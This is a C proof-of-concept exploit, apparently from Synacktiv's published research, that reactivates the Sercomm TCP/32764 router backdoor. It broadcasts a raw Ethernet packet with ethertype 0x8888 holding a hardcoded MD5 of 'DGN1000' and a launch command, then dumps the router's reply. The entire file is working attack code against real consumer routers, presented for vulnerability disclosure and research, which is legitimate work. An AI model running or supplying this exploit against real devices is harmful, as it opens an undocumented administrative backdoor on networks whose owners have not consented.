1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164 | /***************************************
* PoC to reactivate Sercomm TCP/32674 backdoor
* See http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf
* Eloi Vanderbeken - Synacktiv
*
* THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* PoC based on Wilmer van der Gaast's code
* http://wiki.openwrt.org/_media/toh/netgear/dg834.g.v4/nftp.c
***************************************/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <linux/if_arp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#define ETH_P_NFTP 0x8888
enum backdoor_command {
PING_BACKDOOR = 0x200,
SCFGMGR_LAUNCH,
SET_IP
};
struct ether_header
{
unsigned char ether_dhost[ETH_ALEN];
unsigned char ether_shost[ETH_ALEN];
unsigned short ether_type;
} eth;
struct raw_packet {
struct ether_header header;
uint16_t type;
uint16_t sequence;
uint16_t offset;
uint16_t chunk;
uint16_t payload_len;
uint8_t payload[528];
};
int main(int argc, char *argv[])
{
int sockfd, res, i, len;
char src_mac[ETH_ALEN];
struct ifreq iface;
struct sockaddr_ll socket_address;
struct raw_packet packet;
memset(&packet, 0, sizeof(packet));
if (argc < 2)
{
fprintf(stderr, "usage : %s [IFNAME]\n", argv[0]);
exit(1);
}
sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (sockfd == -1)
{
if(geteuid() != 0)
{
fprintf(stderr, "You should probably run this program as root.\n");
}
perror("socket");
exit(1);
}
seteuid(getuid());
strncpy(iface.ifr_name, argv[1], IFNAMSIZ);
res = ioctl(sockfd, SIOCGIFHWADDR, &iface);
if(res < 0)
{
perror("ioctl");
exit(1);
}
memcpy(src_mac, iface.ifr_hwaddr.sa_data, ETH_ALEN);
res = ioctl(sockfd, SIOCGIFINDEX, &iface);
if(res < 0)
{
perror("ioctl");
exit(1);
}
// set src mac
memcpy(packet.header.ether_shost, src_mac, ETH_ALEN);
// broadcast
memset(packet.header.ether_dhost, 0xFF, ETH_ALEN);
// MD5("DGN1000")
memcpy(packet.payload, "\x45\xD1\xBB\x33\x9B\x07\xA6\x61\x8B\x21\x14\xDB\xC0\xD7\x78\x3E", 0x10);
packet.payload_len = htole16(0x10);
// ethernet packet type = 0x8888
packet.header.ether_type = htons(ETH_P_NFTP);
// launch TCP/32764 backdoor
packet.type = htole16(SCFGMGR_LAUNCH);
socket_address.sll_family = PF_PACKET;
socket_address.sll_protocol = htons(ETH_P_NFTP);
socket_address.sll_ifindex = iface.ifr_ifindex;
socket_address.sll_hatype = ARPHRD_ETHER;
socket_address.sll_pkttype = PACKET_OTHERHOST;
// broadcast
socket_address.sll_halen = ETH_ALEN;
memset(socket_address.sll_addr, 0xFF, ETH_ALEN);
res = sendto(sockfd, &packet, 0x10 + 24, 0, (struct sockaddr *)&socket_address, sizeof(socket_address));
if (res == -1)
{
perror("sendto");
exit(1);
}
do {
memset(&packet, 0, sizeof(packet));
res = recvfrom(sockfd, &packet, sizeof(packet), 0, NULL, NULL);
if (res == -1)
{
perror("recvfrom");
exit(1);
}
} while (ntohs(packet.header.ether_type) != ETH_P_NFTP);
if (res < sizeof(packet) - sizeof(packet.payload))
{
fprintf(stderr, "packet is too short: %d bytes\n", res);
exit(1);
}
len = be16toh(packet.payload_len); // SerComm has a real problem with endianness
printf("received packet: %d bytes (payload len = %d) from ", res, len);
for (i = 0; i < ETH_ALEN; i++)
printf("%02X%c", packet.header.ether_shost[i], i == ETH_ALEN-1 ? '\n' : ':');
for (i = 0; (i < len) && (i < sizeof(packet.payload)); i++)
{
printf("%02X ", packet.payload[i]);
if ((i+1) % 16 == 0)
printf("\n");
}
printf("\n");
return 0;
}
|
